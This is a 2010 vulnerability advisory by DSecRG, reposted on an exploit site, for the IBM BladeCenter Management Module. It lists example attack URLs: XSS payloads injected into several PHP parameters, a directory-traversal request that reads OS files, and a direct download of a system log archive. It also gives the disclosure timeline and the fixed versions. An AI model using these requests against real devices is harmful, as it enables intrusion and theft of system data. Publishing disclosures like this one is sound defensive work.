Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>IBM Bladecenter Management – Multiple vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
IBM Bladecenter Management – Multiple vulnerabilities
=====================================================

Application: IBM BladeCenter Managemet Module
Versions Affected: BPET48L and may be other versions
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: XSS,Directory traversal, Information disclosure
Exploits: YES
Reported: 05.09.2009
Vendor response: 09.09.2009
Solution: YES
Date of Public Advisory: 05.07.2010
Author: Sintsov Alexey
from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

The BladeCenter management module is prone to multiple security vulnerabilities:

1 Dinamic XSS
2 Directory Listing
3 Unauthorized Access

Details
*******
1. Multiple XSS vulnerabilities found in bladecenter web management

Examples
*******

http://[BLADECENTER]/private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert(‘XSS1′);%3C/script%3E&amp;VLANID=&amp;IPADDR=3&gt;%3Cscript%3Ealert(‘XSS2′);%3C/script%3E

http://[BLADECENTER]/private/power_management_policy_options.php?domain=3&lt;XSS&gt;

http://[BLADECENTER]/private/pm_temp.php?view=6&amp;mod_type=3&amp;slot=3&lt;XSS&gt;

http://[BLADECENTER]/private/power_module.php?view=4&amp;mod_type=4&amp;slot=3&lt;XSS&gt;

http://[BLADECENTER]/private/pm_temp.php?view=6&amp;mod_type=3&amp;slot=3&lt;XSS&gt;

http://[BLADECENTER]/private/blade_leds.php?WEBINDEX=3&lt;XSS&gt;

http://[BLADECENTER]/private/ipmi_bladestatus.php?SLOT=3&lt;XSS&gt;&amp;save=1

2. Directory Listing vulnerability found in bladecenter web management

Attacker need to be authorized.

Examples
*******

http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc

Attacker can get full access to OS files.

3. UNauthorized access

Access to the sensitive data (system logs, cores) can be done by requesting a file:

Examples
*******

http://[BLADECENTER]/private/sdc.tgz

Solution
********

All three issues were fixed in the v4.7 and v5.0

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-06]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13165